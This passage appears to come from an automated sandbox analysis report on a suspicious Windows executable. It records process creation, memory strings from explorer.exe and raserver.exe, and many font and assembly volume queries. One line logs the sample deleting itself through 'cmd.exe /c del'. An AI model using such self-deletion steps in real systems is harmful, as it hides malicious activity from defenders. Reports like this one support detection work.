            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess created: C:\Users\user\Desktop\hvEop8Y70Y.exe C:\Users\user\Desktop\hvEop8Y70Y.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000005.00000002.505672604.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Users\user\Desktop\hvEop8Y70Y.exe VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
